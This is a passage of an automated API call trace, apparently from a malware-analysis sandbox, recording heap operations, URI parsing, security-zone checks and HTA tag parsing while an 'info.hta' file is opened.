hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ab958 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ab858 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ab7e0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49e0c8 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ab7a0 | out: hHeap=0x470000) returned 1 [0226.838] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x34) returned 0x4af940 [0226.838] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x70) returned 0x4b0840 [0226.838] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xf8) returned 0x4e0678 [0226.838] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8b4) returned 0x4ab7a0 [0226.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e0c8 [0226.839] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e0b0 [0226.839] IsCharSpaceW (wch=0x48) returned 0 [0226.839] IsCharAlphaNumericW (ch=0x5c) returned 0 [0226.839] IsCharSpaceW (wch=0x5c) returned 0 [0226.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x493528 [0226.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4ae1c8 [0226.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4934c8 [0226.839] IsCharSpaceW (wch=0x41) returned 0 [0226.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x49e110 [0226.839] IsCharAlphaNumericW (ch=0x20) returned 0 [0226.839] IsCharSpaceW (wch=0x20) returned 1 [0226.839] IsCharSpaceW (wch=0x7b) returned 0 [0226.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4a4730 [0226.839] IsCharSpaceW (wch=0x20) returned 1 [0226.839] IsCharAlphaNumericW (ch=0x7b) returned 0 [0226.839] IsCharSpaceW (wch=0x62) returned 0 [0226.839] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae1c8 | out: hHeap=0x470000) returned 1 [0226.839] IsCharAlphaNumericW (ch=0x3a) returned 0 [0226.839] IsCharSpaceW (wch=0x3a) returned 0 [0226.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4a4708 [0226.839] IsCharAlphaNumericW (ch=0x3a) returned 0 [0226.839] IsCharSpaceW (wch=0x75) returned 0 [0226.839] IsCharAlphaNumericW (ch=0x28) returned 0 [0226.839] IsCharSpaceW (wch=0x28) returned 0 [0226.839] IsCharAlphaNumericW (ch=0x28) returned 0 [0226.839] IsCharSpaceW (wch=0x23) returned 0 [0226.839] IsCharSpaceW (wch=0x23) returned 0 [0226.839] IsCharSpaceW (wch=0x7d) returned 0 [0226.839] IsCharAlphaNumericW (ch=0x7d) returned 0 [0226.839] IsCharSpaceW (wch=0x29) returned 0 [0226.839] IsCharSpaceW (wch=0x75) returned 0 [0226.839] IsCharSpaceW (wch=0x75) returned 0 [0226.839] IsCharSpaceW (wch=0x29) returned 0 [0226.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4934e8 [0226.839] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x34) returned 0x4afa40 [0226.840] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x484028 [0226.840] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e0f8 [0226.840] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e0e0 [0226.840] CoTaskMemFree (pv=0x4a9480) [0226.840] CoTaskMemFree (pv=0x4e0848) [0226.847] IUnknown:Release (This=0x49bd1c) returned 0xa [0226.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.847] IUnknown:Release (This=0x49bd1c) returned 0x9 [0226.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b3138 | out: hHeap=0x470000) returned 1 [0226.847] IUnknown:Release (This=0x49bd1c) returned 0x8 [0226.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48d818 | out: hHeap=0x470000) returned 1 [0226.847] IUnknown:Release (This=0x49bd1c) returned 0x7 [0226.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b1908 | out: hHeap=0x470000) returned 1 [0226.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b1b68 | out: hHeap=0x470000) returned 1 [0226.848] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x41e23c | out: ppURI=0x41e23c*=0x49c07c) returned 0x0 [0226.848] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41e214 | out: ppvObject=0x41e214*=0x49c07c) returned 0x0 [0226.848] IUnknown:Release (This=0x49c07c) returned 0xb [0226.848] IUnknown:AddRef (This=0x49c07c) returned 0xc [0226.848] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x72) returned 0x481de8 [0226.848] IUnknown:Release (This=0x49c07c) returned 0xb [0226.848] IUnknown:Release (This=0x49c07c) returned 0xa [0226.848] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100) returned 0x4e3cd0 [0226.848] FindResourceW (hModule=0x71da0000, lpName=0x1fe, lpType=0x6) returned 0x22084d0 [0226.848] LoadResource (hModule=0x71da0000, hResInfo=0x22084d0) returned 0x222e53c [0226.848] LockResource (hResData=0x222e53c) returned 0x222e53c [0226.848] VirtualQuery (in: lpAddress=0x222e53c, lpBuffer=0x41f3e4, dwLength=0x1c | out: lpBuffer=0x41f3e4*(BaseAddress=0x222e000, AllocationBase=0x1f50000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0226.848] SizeofResource (hModule=0x71da0000, hResInfo=0x22084d0) returned 0xe6 [0226.848] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x481de8 | out: hHeap=0x470000) returned 1 [0226.848] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4e3cd0, Size=0x90) returned 0x4e3cd0 [0226.848] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x94) returned 0x4cde88 [0226.848] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41f5a0 | out: ppu=0x41f5a0) returned 0x0 [0226.848] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.848] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.849] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.849] StrCmpNICW (lpStr1="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0226.849] StrStrIW (lpFirst="", lpSrch="http://www.w3.org/TR/REC-html40/strict.dtd") returned 0x0 [0226.849] StrStrIW (lpFirst="", lpSrch="DTD XHTML") returned 0x0 [0226.849] StrStrIW (lpFirst="", lpSrch="DTD HTML 4") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0226.849] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0226.849] StrStrIW (lpFirst="", lpSrch="DTD XHTML 1.0") returned 0x0 [0226.849] StrStrIW (lpFirst="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0226.849] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0226.849] StrStrIW (lpFirst="", lpSrch=" Transitional//") returned 0x0 [0226.849] StrStrIW (lpFirst="", lpSrch=" Frameset//") returned 0x0 [0226.849] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e70d8 | out: hHeap=0x470000) returned 1 [0226.849] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x34) returned 0x4afa80 [0226.849] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4ae278 [0226.849] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4af3a8 [0226.849] GetTickCount () returned 0x209fe [0226.849] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.849] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4ae698 [0226.849] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0226.850] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41f58c, dwFlags=0x0 | out: pdwZone=0x41f58c*=0xffffffff) returned 0x800c0011 [0226.850] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.850] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.850] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.850] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwAction=0x2106, pPolicy=0x41f590, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x41f590*=0x0) returned 0x0 [0226.850] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.850] IUnknown:Release (This=0x49c22c) returned 0x2 [0226.850] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4af3a8 | out: hHeap=0x470000) returned 1 [0226.850] GetTickCount () returned 0x209fe [0226.850] GetTickCount () returned 0x209fe [0226.850] GetCurrentThreadId () returned 0x390 [0226.850] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48d818 | out: hHeap=0x470000) returned 1 [0226.850] GetCurrentThreadId () returned 0x390 [0226.850] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4af3a8 | out: hHeap=0x470000) returned 1 [0226.850] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae850 | out: hHeap=0x470000) returned 1 [0226.850] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bb0e8 | out: hHeap=0x470000) returned 1 [0226.850] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.850] GetTickCount () returned 0x209fe [0226.850] GetTickCount () returned 0x209fe [0226.888] StrChrW (lpStart="HTA:APPLICATION", wMatch=0x3a) returned=":APPLICATION" [0226.888] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4af3a8 [0226.888] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4e7558 [0226.888] StrCmpNICW (lpStr1="on", lpStr2="Sy", nChar=2) returned -4 [0226.888] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2a) returned 0x48d818 [0226.888] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4bc410 [0226.888] StrCmpNICW (lpStr1="on", lpStr2="SI", nChar=2) returned -4 [0226.888] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x16) returned 0x493548 [0226.888] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4e3020 [0226.888] StrCmpNICW (lpStr1="on", lpStr2="IC", nChar=2) returned 6 [0226.888] StrChrW (lpStart="HTA:APPLICATION", wMatch=0x3a) returned=":APPLICATION" [0226.888] StrCmpICW (pszStr1="PUBLIC", pszStr2="HTA") returned 8 [0226.889] StrCmpICW (pszStr1="HTA", pszStr2="HTA") returned 0 [0226.889] StrCmpICW (pszStr1="APPLICATION", pszStr2="APPLICATION") returned 0 [0226.956] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4ae850 [0226.956] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4af3f0 [0226.956] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.956] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4ae7a0 [0226.957] IsCharSpaceW (wch=0x75) returned 0 [0226.957] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0226.957] IsCharSpaceW (wch=0x28) returned 0 [0226.957] IsCharSpaceW (wch=0x23) returned 0 [0226.957] IsCharSpaceW (wch=0x23) returned 0 [0226.957] IsCharSpaceW (wch=0x64) returned 0 [0226.957] IsCharSpaceW (wch=0x65) returned 0 [0226.957] IsCharSpaceW (wch=0x66) returned 0 [0226.957] IsCharSpaceW (wch=0x61) returned 0 [0226.957] IsCharSpaceW (wch=0x75) returned 0 [0226.957] IsCharSpaceW (wch=0x6c) returned 0 [0226.957] IsCharSpaceW (wch=0x74) returned 0 [0226.957] IsCharSpaceW (wch=0x23) returned 0 [0226.957] IsCharSpaceW (wch=0x41) returned 0 [0226.957] IsCharSpaceW (wch=0x50) returned 0 [0226.957] IsCharSpaceW (wch=0x50) returned 0 [0226.957] IsCharSpaceW (wch=0x4c) returned 0 [0226.957] IsCharSpaceW (wch=0x49) returned 0 [0226.957] IsCharSpaceW (wch=0x43) returned 0 [0226.957] IsCharSpaceW (wch=0x41) returned 0 [0226.957] IsCharSpaceW (wch=0x54) returned 0 [0226.957] IsCharSpaceW (wch=0x49) returned 0 [0226.957] IsCharSpaceW (wch=0x4f) returned 0 [0226.957] IsCharSpaceW (wch=0x4e) returned 0 [0226.957] IsCharSpaceW (wch=0x29) returned 0 [0226.957] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x36) returned 0x4afb00 [0226.957] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4af378 [0226.957] IsCharSpaceW (wch=0x0) returned 0 [0226.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4afb00 | out: hHeap=0x470000) returned 1 [0226.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4af378 | out: hHeap=0x470000) returned 1 [0226.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.957] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x18) returned 0x4e3040 [0226.957] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x18) returned 0x4e3060 [0226.957] IsCharSpaceW (wch=0x75) returned 0 [0226.957] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0226.957] IsCharSpaceW (wch=0x28) returned 0 [0226.957] IsCharSpaceW (wch=0x23) returned 0 [0226.957] IsCharSpaceW (wch=0x23) returned 0 [0226.957] IsCharSpaceW (wch=0x64) returned 0 [0226.958] IsCharSpaceW (wch=0x65) returned 0 [0226.958] IsCharSpaceW (wch=0x66) returned 0 [0226.958] IsCharSpaceW (wch=0x61) returned 0 [0226.958] IsCharSpaceW (wch=0x75) returned 0 [0226.958] IsCharSpaceW (wch=0x6c) returned 0 [0226.958] IsCharSpaceW (wch=0x74) returned 0 [0226.958] IsCharSpaceW (wch=0x23) returned 0 [0226.958] IsCharSpaceW (wch=0x41) returned 0 [0226.958] IsCharSpaceW (wch=0x50) returned 0 [0226.958] IsCharSpaceW (wch=0x50) returned 0 [0226.958] IsCharSpaceW (wch=0x4c) returned 0 [0226.958] IsCharSpaceW (wch=0x49) returned 0 [0226.958] IsCharSpaceW (wch=0x43) returned 0 [0226.958] IsCharSpaceW (wch=0x41) returned 0 [0226.958] IsCharSpaceW (wch=0x54) returned 0 [0226.958] IsCharSpaceW (wch=0x49) returned 0 [0226.958] IsCharSpaceW (wch=0x4f) returned 0 [0226.958] IsCharSpaceW (wch=0x4e) returned 0 [0226.958] IsCharSpaceW (wch=0x29) returned 0 [0226.958] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x36) returned 0x4afb00 [0226.958] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4af3f0 [0226.958] IsCharSpaceW (wch=0x0) returned 0 [0226.958] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x54) returned 0x4bccd0 [0226.958] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x484190, Size=0x60) returned 0x4bb0e8 [0226.958] CoInternetIsFeatureEnabled (FeatureEntry=0x6, dwFlags=0x2) returned 0x0 [0226.964] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0226.964] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41d664, dwFlags=0x0 | out: pdwZone=0x41d664*=0xffffffff) returned 0x800c0011 [0226.964] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.964] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.964] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.964] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwAction=0x2000, pPolicy=0x41d668, cbPolicy=0x4, pContext=0x4afb0c*=0x23, cbContext=0x2a, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x41d668*=0x0) returned 0x0 [0226.964] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.964] IUnknown:Release (This=0x49c22c) returned 0x2 [0226.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x50) returned 0x4ae7a0 [0226.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x34) returned 0x4afb40 [0226.964] StrChrW (lpStart="default#APPLICATION", wMatch=0x23) returned="#APPLICATION" [0226.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x12) returned 0x4e3040 [0226.964] StrChrW (lpStart="default", wMatch=0x23) returned 0x0 [0226.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa8) returned 0x4e3bc0 [0226.964] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0226.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x16) returned 0x4e3080 [0226.964] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0226.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4e30a0 [0226.964] GetCurrentThreadId () returned 0x390 [0226.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4af270 [0226.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1a) returned 0x4e7468 [0226.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x94) returned 0x4ac060 [0226.965] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.965] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa8) returned 0x4ac100 [0226.965] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2e) returned 0x48d850 [0226.965] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0226.967] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4e30c0 [0226.967] GetCurrentThreadId () returned 0x390 [0226.967] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x32) returned 0x4afb80 [0226.967] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e3040 | out: hHeap=0x470000) returned 1 [0226.967] StrChrW (lpStart="default#APPLICATION", wMatch=0x23) returned="#APPLICATION" [0226.967] GetProcAddress (hModule=0x76340000, lpProcName=0x2) returned 0x76344642 [0226.967] StrCmpICW (pszStr1="APPLICATION", pszStr2="Application") returned 0 [0226.967] GetCurrentThreadId () returned 0x390 [0226.967] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x24) returned 0x4b1240 [0226.968] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4e3040 [0226.968] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x64) returned 0x4c2968 [0226.968] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x484190 [0226.968] GetCurrentThreadId () returned 0x390 [0226.968] 